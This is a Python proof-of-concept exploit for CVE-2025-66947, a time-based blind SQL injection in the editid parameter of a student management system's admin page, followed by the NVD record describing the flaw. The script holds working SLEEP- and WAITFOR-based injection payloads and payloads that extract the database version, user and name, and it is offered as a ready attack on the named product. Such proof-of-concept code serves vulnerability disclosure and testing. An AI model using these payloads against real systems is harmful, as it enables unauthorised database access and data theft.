CVE-2025-66947

import requests import time # CVE-2025-66947 SQL Injection PoC # Target: krishanmuraiji SMS v1.0 # Vulnerability: SQL Injection in /studentms/admin/edit-class-detail.php (editid parameter) target_url = "http://target.com/studentms/admin/edit-class-detail.php" def test_sql_injection(): """Test for SQL injection vulnerability using time-based blind technique""" # Normal request - baseline response time start_time = time.time() normal_params = {"editid": "1"} response = requests.get(target_url, params=normal_params, timeout=10) baseline_time = time.time() - start_time print(f"[*] Baseline response time: {baseline_time:.2f} seconds") # SQL injection payload with SLEEP() function # This payload causes a 5-second delay if vulnerable injection_payloads = [ "1' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1", # MySQL "1' OR SLEEP(5)-- -", # Alternative payload "1' WAITFOR DELAY '00:00:05'--", # SQL Server ] for payload in injection_payloads: print(f"\n[*] Testing payload: {payload}") start_time = time.time() params = {"editid": payload} try: response = requests.get(target_url, params=params, timeout=30) elapsed_time = time.time() - start_time print(f"[+] Response time: {elapsed_time:.2f} seconds") if elapsed_time >= 5: print("[!] VULNERABLE! Time-based SQL injection confirmed.") print(f"[!] The application delayed response by {elapsed_time:.2f} seconds.") return True else: print("[-] No significant delay detected.") except requests.exceptions.Timeout: print("[!] Request timed out - possible vulnerability") return True except Exception as e: print(f"[-] Error: {str(e)}") return False def extract_data(): """Extract database information using time-based blind SQL injection""" # Database version extraction payload version_payload = "1' AND (SELECT * FROM (SELECT IF(SUBSTRING(@@version,1,1)='5',SLEEP(3),0))a) AND '1'='1" print("\n[*] Extracting database version...") # Implementation would iterate through characters # and measure response times to determine version # Example: Database user extraction user_payload = "1' AND (SELECT * FROM (SELECT IF(SUBSTRING(current_user(),1,1)='r',SLEEP(3),0))a) AND '1'='1" print("[*] Extracting database user...") # Example: Database name extraction db_payload = "1' AND (SELECT * FROM (SELECT IF(SUBSTRING(database(),1,1)='s',SLEEP(3),0))a) AND '1'='1" print("[*] Extracting database name...") if __name__ == "__main__": print("=" * 60) print("CVE-2025-66947 SQL Injection PoC") print("Target: krishanmuraiji SMS v1.0") print("=" * 60) if test_sql_injection(): print("\n[!] Vulnerability confirmed!") print("[*] Proceeding with data extraction...") extract_data() else: print("\n[-] Target may not be vulnerable or is not reachable.")

{"cve": {"id": "CVE-2025-66947", "sourceIdentifier": "[email protected]", "published": "2025-12-26T15:15:47.700", "lastModified": "2025-12-31T14:54:38.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerability in krishanmuraiji SMS v.1.0, within the /studentms/admin/edit-class-detail.php via the editid GET parameter. An attacker can trigger controlled delays using SQL SLEEP() to infer database contents. Successful exploitation may lead to full database compromise, especially within an administrative module."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:krishanmurariji:student_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FAFDB94F-C57E-4E92-B872-5FAF394CD05C"}]}]}], "references": [{"url": "https://github.com/kabir0104k/CVE-2025-66947/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}